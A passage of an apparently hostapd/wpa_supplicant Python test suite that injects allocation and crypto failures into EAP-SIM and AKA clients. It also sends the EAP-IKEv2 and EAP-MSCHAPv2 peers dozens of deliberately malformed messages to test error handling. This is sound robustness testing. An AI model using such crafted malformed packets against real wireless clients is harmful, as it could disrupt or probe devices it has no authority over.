    for wrapper, func, trigger in reauth_cases:
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="SIM", identity="1232010000000000",
                       password=sim_password)
        with wrapper(dev[0], 1, func):
            hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
            if ev is None:
                raise Exception("EAP re-authentication did not start")
            wait_fail_trigger(dev[0], trigger)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()

    # Memory allocation failures injected at various points of a full
    # authentication run.
    alloc_cases = [ (1, "eap_sim_verify_mac;eap_sim_process_challenge"),
                    (1, "eap_sim_parse_encr;eap_sim_process_challenge"),
                    (1, "eap_sim_msg_init;eap_sim_response_start"),
                    (1, "wpabuf_alloc;eap_sim_msg_init;eap_sim_response_start"),
                    (1, "=eap_sim_learn_ids"),
                    (2, "=eap_sim_learn_ids"),
                    (2, "eap_sim_learn_ids"),
                    (3, "eap_sim_learn_ids"),
                    (1, "eap_sim_process_start"),
                    (1, "eap_sim_getKey"),
                    (1, "eap_sim_get_emsk"),
                    (1, "eap_sim_get_session_id") ]
    for trigger_count, func in alloc_cases:
        with alloc_fail(dev[0], trigger_count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SIM", identity="1232010000000000",
                           password=sim_password,
                           erp="1", wait_connect=False)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()

    # Forced crypto failure while decrypting encrypted attributes.
    fail_cases = [ (1, "aes_128_cbc_decrypt;eap_sim_parse_encr") ]
    for trigger_count, func in fail_cases:
        with fail_test(dev[0], trigger_count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SIM", identity="1232010000000000",
                           password=sim_password,
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
def test_eap_proto_aka_errors(dev, apdev):
    """EAP-AKA protocol tests (error paths)"""
    check_hlr_auc_gw_support()
    ap_params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], ap_params)
    aka_password = "90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123"

    # An allocation failure during method initialization must abort EAP
    # before any exchange takes place.
    with alloc_fail(dev[0], 1, "eap_aka_init"):
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="AKA", identity="0232010000000000",
                       password=aka_password,
                       wait_connect=False)
        ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                               timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()

    # Memory allocation failures injected at various points of a full
    # authentication run; each must be survived cleanly.
    alloc_cases = [ (1, "=eap_aka_learn_ids"),
                    (2, "=eap_aka_learn_ids"),
                    (1, "eap_sim_parse_encr;eap_aka_process_challenge"),
                    (1, "eap_aka_getKey"),
                    (1, "eap_aka_get_emsk"),
                    (1, "eap_aka_get_session_id") ]
    for trigger_count, func in alloc_cases:
        with alloc_fail(dev[0], trigger_count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="AKA", identity="0232010000000000",
                           password=aka_password,
                           erp="1", wait_connect=False)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
def test_eap_proto_aka_prime_errors(dev, apdev):
    """EAP-AKA' protocol tests (error paths)"""
    check_hlr_auc_gw_support()
    ap_params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], ap_params)
    aka_prime_password = "5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123"

    # An allocation failure during method initialization must abort EAP
    # before any exchange takes place.
    with alloc_fail(dev[0], 1, "eap_aka_init"):
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="AKA'", identity="6555444333222111",
                       password=aka_prime_password,
                       wait_connect=False)
        ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                               timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()

    # Failures injected during fast re-authentication following a
    # successful initial connection.
    reauth_cases = [ (fail_test, "aes_128_cbc_encrypt;eap_aka_response_reauth",
                      "GET_FAIL"),
                     (alloc_fail,
                      "eap_sim_parse_encr;eap_aka_process_reauthentication",
                      "GET_ALLOC_FAIL") ]
    for wrapper, func, trigger in reauth_cases:
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="AKA'", identity="6555444333222111",
                       password=aka_prime_password)
        with wrapper(dev[0], 1, func):
            hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
            if ev is None:
                raise Exception("EAP re-authentication did not start")
            wait_fail_trigger(dev[0], trigger)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()

    # Memory allocation failures injected during the challenge round.
    alloc_cases = [ (1, "eap_sim_verify_mac_sha256"),
                    (1, "=eap_aka_process_challenge") ]
    for trigger_count, func in alloc_cases:
        with alloc_fail(dev[0], trigger_count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="AKA'", identity="6555444333222111",
                           password=aka_prime_password,
                           erp="1", wait_connect=False)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
def test_eap_proto_ikev2(dev, apdev):
    """EAP-IKEv2 protocol tests

    Drives the EAP-IKEv2 peer through a long sequence of malformed or
    unexpected server messages (one crafted message per connection attempt)
    to exercise its parsing and error paths.
    """
    check_eap_capa(dev[0], "IKEV2")
    # Handler run inside the test RADIUS server. Each EAP exchange gets one
    # crafted response, selected by the monotonically increasing per-session
    # counter ctx['num']; ctx['id'] tracks the EAP identifier (mod 256).
    def ikev2_handler(ctx, req):
        logger.info("ikev2_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        # idx is incremented before every test case so the cases run in
        # source order, one per connection attempt.
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_IKEV2)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated Message Length field")
            return struct.pack(">BBHBB3B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 3,
                               EAP_TYPE_IKEV2, 0x80, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short Message Length value")
            return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4 + 1,
                               EAP_TYPE_IKEV2, 0x80, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated message")
            return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4,
                               EAP_TYPE_IKEV2, 0x80, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated message(2)")
            return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4,
                               EAP_TYPE_IKEV2, 0x80, 0xffffffff)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated message(3)")
            return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4,
                               EAP_TYPE_IKEV2, 0xc0, 0xffffffff)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated message(4)")
            return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4,
                               EAP_TYPE_IKEV2, 0xc0, 10000000)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too long fragments (first fragment)")
            return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4 + 1,
                               EAP_TYPE_IKEV2, 0xc0, 2, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too long fragments (second fragment)")
            return struct.pack(">BBHBB2B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2,
                               EAP_TYPE_IKEV2, 0x00, 2, 3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No Message Length field in first fragment")
            return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 1,
                               EAP_TYPE_IKEV2, 0x40, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: ICV before keys")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_IKEV2, 0x20)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported IKEv2 header version")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Incorrect IKEv2 header Length")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0x20, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected IKEv2 Exchange Type in SA_INIT state")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0x20, 0, 0, 0, 28)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected IKEv2 Message ID in SA_INIT state")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0x20, 34, 0, 1, 28)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected IKEv2 Flags value")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0x20, 34, 0, 0, 28)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected IKEv2 Flags value(2)")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0x20, 34, 0x20, 0, 28)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No SAi1 in SA_INIT")
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 28,
                               EAP_TYPE_IKEV2, 0x00,
                               0, 0, 0, 0,
                               0, 0x20, 34, 0x08, 0, 28)
        # Build a full EAP-IKEv2 request: EAP header + IKEv2 header + payload.
        def build_ike(id, next=0, exch_type=34, flags=0x00, ike=''):
            return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, id,
                               4 + 1 + 1 + 28 + len(ike),
                               EAP_TYPE_IKEV2, flags,
                               0, 0, 0, 0,
                               next, 0x20, exch_type, 0x08, 0,
                               28 + len(ike)) + ike
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected extra data after payloads")
            return build_ike(ctx['id'], ike=struct.pack(">B", 1))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated payload header")
            return build_ike(ctx['id'], next=128, ike=struct.pack(">B", 1))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too small payload header length")
            ike = struct.pack(">BBH", 0, 0, 3)
            return build_ike(ctx['id'], next=128, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too large payload header length")
            ike = struct.pack(">BBH", 0, 0, 5)
            return build_ike(ctx['id'], next=128, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported payload (non-critical and critical)")
            ike = struct.pack(">BBHBBH", 129, 0, 4, 0, 0x01, 4)
            return build_ike(ctx['id'], next=128, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Certificate and empty SAi1")
            ike = struct.pack(">BBHBBH", 33, 0, 4, 0, 0, 4)
            return build_ike(ctx['id'], next=37, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short proposal")
            ike = struct.pack(">BBHBBHBBB", 0, 0, 4 + 7,
                              0, 0, 7, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too small proposal length in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 7, 0, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too large proposal length in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 9, 0, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected proposal type in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              1, 0, 8, 0, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Protocol ID in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 8, 0, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected proposal number in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 8, 0, 1, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Not enough room for SPI in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 8, 1, 1, 1, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected SPI in SAi1")
            ike = struct.pack(">BBHBBHBBBBB", 0, 0, 4 + 9,
                              0, 0, 9, 1, 1, 1, 0, 1)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No transforms in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 8, 1, 1, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short transform in SAi1")
            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 8, 1, 1, 0, 1)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too small transform length in SAi1")
            ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
                              0, 0, 8 + 8, 1, 1, 0, 1,
                              0, 0, 7, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too large transform length in SAi1")
            ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
                              0, 0, 8 + 8, 1, 1, 0, 1,
                              0, 0, 9, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Transform type in SAi1")
            ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
                              0, 0, 8 + 8, 1, 1, 0, 1,
                              1, 0, 8, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No transform attributes in SAi1")
            ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
                              0, 0, 8 + 8, 1, 1, 0, 1,
                              0, 0, 8, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No transform attr for AES and unexpected data after transforms in SAi1")
            tlen1 = 8 + 3
            tlen2 = 8 + 4
            tlen3 = 8 + 4
            tlen = tlen1 + tlen2 + tlen3
            ike = struct.pack(">BBHBBHBBBBBBHBBH3BBBHBBHHHBBHBBHHHB",
                              0, 0, 4 + 8 + tlen + 1,
                              0, 0, 8 + tlen + 1, 1, 1, 0, 3,
                              3, 0, tlen1, 1, 0, 12, 1, 2, 3,
                              3, 0, tlen2, 1, 0, 12, 0, 128,
                              0, 0, tlen3, 1, 0, 12, 0x8000 | 14, 127,
                              1)
            return build_ike(ctx['id'], next=33, ike=ike)
        # Valid SA payload (proposal with five transforms) used by the
        # remaining positive-path test cases.
        def build_sa(next=0):
            tlen = 5 * 8
            return struct.pack(">BBHBBHBBBBBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
                               next, 0, 4 + 8 + tlen,
                               0, 0, 8 + tlen, 1, 1, 0, 5,
                               3, 0, 8, 1, 0, 3,
                               3, 0, 8, 2, 0, 1,
                               3, 0, 8, 3, 0, 1,
                               3, 0, 8, 4, 0, 5,
                               0, 0, 8, 241, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid proposal, but no KEi in SAi1")
            ike = build_sa()
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Empty KEi in SAi1")
            ike = build_sa(next=34) + struct.pack(">BBH", 0, 0, 4)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Mismatch in DH Group in SAi1")
            ike = build_sa(next=34)
            ike += struct.pack(">BBHHH", 0, 0, 4 + 4 + 96, 12345, 0)
            ike += 96*'\x00'
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid DH public value length in SAi1")
            ike = build_sa(next=34)
            ike += struct.pack(">BBHHH", 0, 0, 4 + 4 + 96, 5, 0)
            ike += 96*'\x00'
            return build_ike(ctx['id'], next=33, ike=ike)
        # Key Exchange payload advertising DH group 5 with an all-zero
        # 192-octet public value.
        def build_ke(next=0):
            ke = struct.pack(">BBHHH", next, 0, 4 + 4 + 192, 5, 0)
            ke += 192*'\x00'
            return ke
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid proposal and KEi, but no Ni in SAi1")
            ike = build_sa(next=34)
            ike += build_ke()
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short Ni in SAi1")
            ike = build_sa(next=34)
            ike += build_ke(next=40)
            ike += struct.pack(">BBH", 0, 0, 4)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too long Ni in SAi1")
            ike = build_sa(next=34)
            ike += build_ke(next=40)
            ike += struct.pack(">BBH", 0, 0, 4 + 257) + 257*'\x00'
            return build_ike(ctx['id'], next=33, ike=ike)
        def build_ni(next=0):
            return struct.pack(">BBH", next, 0, 4 + 256) + 256*'\x00'
        # Complete, well-formed SAi1 message (SA + KE + Ni).
        # NOTE(review): the id parameter is unused; the closure uses
        # ctx['id'] instead.
        def build_sai1(id):
            ike = build_sa(next=34)
            ike += build_ke(next=40)
            ike += build_ni()
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
            return build_sai1(ctx['id'])
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
            return build_sai1(ctx['id'])
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No integrity checksum")
            ike = ''
            return build_ike(ctx['id'], next=37, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
            return build_sai1(ctx['id'])
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated integrity checksum")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_IKEV2, 0x20)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
            return build_sai1(ctx['id'])
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid integrity checksum")
            ike = ''
            return build_ike(ctx['id'], next=37, flags=0x20, ike=ike)
        return None
    srv = start_radius_server(ikev2_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # One connection attempt per handler test case; iterations 40 and 45
        # are expected to end in an explicit EAP failure event, the rest are
        # simply torn down after a short wait.
        for i in range(49):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="IKEV2", identity="user",
                           password="password",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            if i in [ 40, 45 ]:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            else:
                time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
def NtPasswordHash(password):
    """Return the NT password hash: MD4 over the UTF-16-LE encoded password."""
    return hashlib.new('md4', password.encode('utf_16_le')).digest()
def HashNtPasswordHash(password_hash):
    """Return the double hash: MD4 over an NT password hash (RFC 2759)."""
    md4 = hashlib.new('md4')
    md4.update(password_hash)
    return md4.digest()
def ChallengeHash(peer_challenge, auth_challenge, username):
    """Return the 8-octet MS-CHAPv2 challenge hash (RFC 2759 ChallengeHash)."""
    return hashlib.sha1(peer_challenge + auth_challenge + username).digest()[0:8]
def GenerateAuthenticatorResponse(password, nt_response, peer_challenge,
                                  auth_challenge, username):
    """Compute the MS-CHAPv2 authenticator response (RFC 2759 section 8.7).

    Two SHA-1 passes: the first over the double-hashed password, the peer's
    NT-Response and Magic1; the second mixes in the 8-octet challenge hash
    and Magic2. Returns the 20-octet response digest.
    """
    magic1 = binascii.unhexlify("4D616769632073657276657220746F20636C69656E74207369676E696E6720636F6E7374616E74")
    magic2 = binascii.unhexlify("50616420746F206D616B6520697420646F206D6F7265207468616E206F6E6520697465726174696F6E")
    pw_hash_hash = HashNtPasswordHash(NtPasswordHash(password))
    first_pass = hashlib.sha1(pw_hash_hash + nt_response + magic1).digest()
    challenge = ChallengeHash(peer_challenge, auth_challenge, username)
    return hashlib.sha1(first_pass + challenge + magic2).digest()
def test_eap_proto_mschapv2(dev, apdev):
    """EAP-MSCHAPv2 protocol tests

    Feeds the EAP-MSCHAPv2 peer a sequence of malformed, unexpected, and
    valid server messages (one scripted exchange per connection attempt),
    including two full password-change rounds with real authenticator
    response computation.
    """
    check_eap_capa(dev[0], "MSCHAPV2")
    # RADIUS-hosted handler; ctx['num'] selects the test case, one per
    # EAP exchange.
    def mschapv2_handler(ctx, req):
        logger.info("mschapv2_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_MSCHAPV2)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown MSCHAPv2 op_code")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1,
                               EAP_TYPE_MSCHAPV2,
                               0, 0, 5, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid ms_len and unknown MSCHAPv2 op_code")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1,
                               EAP_TYPE_MSCHAPV2,
                               255, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Success before challenge")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1,
                               EAP_TYPE_MSCHAPV2,
                               3, 0, 5, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure before challenge - required challenge field not present")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1,
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 5, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure before challenge - invalid failure challenge len")
            payload = 'C=12'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure before challenge - invalid failure challenge len")
            payload = 'C=12 V=3'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure before challenge - invalid failure challenge")
            payload = 'C=00112233445566778899aabbccddeefQ '
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure before challenge - password expired")
            payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Success after password change")
            payload = "S=1122334455667788990011223344556677889900"
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               3, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid challenge length")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1,
                               EAP_TYPE_MSCHAPV2,
                               1, 0, 4 + 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short challenge packet")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1,
                               EAP_TYPE_MSCHAPV2,
                               1, 0, 4 + 1, 16)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1 + 16 + 6,
                               EAP_TYPE_MSCHAPV2,
                               1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure - password expired")
            payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            # First full password-change round: parse the Change-Password
            # packet fields and compute a genuine authenticator response so
            # the peer accepts the Success message.
            logger.info("Test: Success after password change")
            if len(req) != 591:
                logger.info("Unexpected Change-Password packet length: %s" % len(req))
                return None
            data = req[9:]
